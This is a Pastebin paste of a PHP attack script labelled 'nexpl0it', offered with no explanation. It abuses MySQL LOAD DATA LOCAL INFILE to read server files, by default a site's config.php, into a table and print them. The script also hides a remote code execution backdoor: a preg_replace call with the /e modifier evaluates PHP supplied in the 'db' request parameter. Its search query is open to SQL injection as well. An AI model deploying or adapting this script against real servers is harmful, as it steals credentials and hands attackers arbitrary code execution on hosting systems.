Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?
- $mysql_host = (isset($_GET[mysql_host]))?$_GET[mysql_host]:"localhost";
- $mysql_user = (isset($_GET[mysql_user]))?$_GET[mysql_user]:"";
- $mysql_pass = (isset($_GET[mysql_pass]))?$_GET[mysql_pass]:"";
- $calcname = explode(".", getenv("HTTP_HOST"));
- $mysql_name =(isset($_GET[mysql_name]))?$_GET[mysql_name]:"my_".$calcname[0];
- $mysql_xploit = preg_replace("/(.+)/e", $_GET[db], $_GET[db]);
- $path = (isset($_GET[path]))?$_GET[path]:"/membri/SITO/config.php";
- $limit = (isset($_GET[limit]))?$_GET[limit]:"0,30";
- $search = (isset($_GET[search]))?$_GET[search]:"";
- ?>
- <? // Logo
- ?>
- <center>
- <img src="http://img15.imageshack.us/img15/8676/logoxgh.jpg" />
- <br>
- <br>
- <form action="#" method="GET">
- host <input type=text name=mysql_host value='<?=$mysql_host;?>'/><br />
- user <input type=text name=mysql_user value='<?=$mysql_user;?>'/><br />
- pass <input type=text name=mysql_pass value='<?=$mysql_pass;?>'/><br />
- name <input type=text name=mysql_name value='<?=$mysql_name;?>'/><br />
- path <input type=text name=path value='<?=$path;?>' /><br />
- [ limit <input type=text name=limit value='<?=$limit;?>' /> ]<br />
- [ search <input type=text name=search value='<?=$search;?>' /> ]<br />
- <input type=submit value=send />
- </form>
- <?
- if (isset($_GET[mysql_host])) {
- $search = $_GET[search];
- $link = mysql_connect($_GET['mysql_host'], $_GET['mysql_user'], $_GET['mysql_pass'])or die(mysql_error());
- $db = mysql_select_db($_GET['mysql_name']);
- $path = $_GET['path'];
- $limit = $_GET['limit'];
- $query = "CREATE TABLE `nexpl0it` (`path` longtext not null);";
- $delete = "DROP TABLE `nexpl0it`;";
- $bypass = "LOAD DATA LOCAL INFILE '$path' INTO TABLE nexpl0it;";
- $l = (!empty($_GET[limit])) ? " LIMIT $limit" : "";
- $fuck = "SELECT * FROM nexpl0it".$l;
- mysql_query($delete);
- mysql_query($query)or die(mysql_error());
- mysql_query($bypass)or die("Mysql-exploit-error : ".mysql_error());
- $res = mysql_query($fuck)or die(mysql_error());
- $txt = "";
- while($row = mysql_fetch_array($res)) {
- $txt .= $row[path]."\n";
- }
- $output = "<form action=# method=POST><input type=hidden name=mode value=sqlwritefile>
- <textarea rows=30 cols=100 name=newtext>".htmlspecialchars($txt)."</textarea></form>";
- }
- if (!empty($search)) {
- $q = "SELECT * FROM nexpl0it WHERE path LIKE '%".$search."%'";
- $result = mysql_query($q)or die("Mysql-exploit-error : ".mysql_error());
- $txt2 = "";
- while($riga = mysql_fetch_assoc($result)) {
- $txt2 .= $riga[path];
- }
- $output .= "Search results: <form action=# method=POST><input type=hidden name=mode value=sqlwritefile>
- <textarea rows=30 cols=100 name=newtext>".htmlspecialchars($txt2)."</textarea></form>";
- }
- echo $output;
- ?>
- </center>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement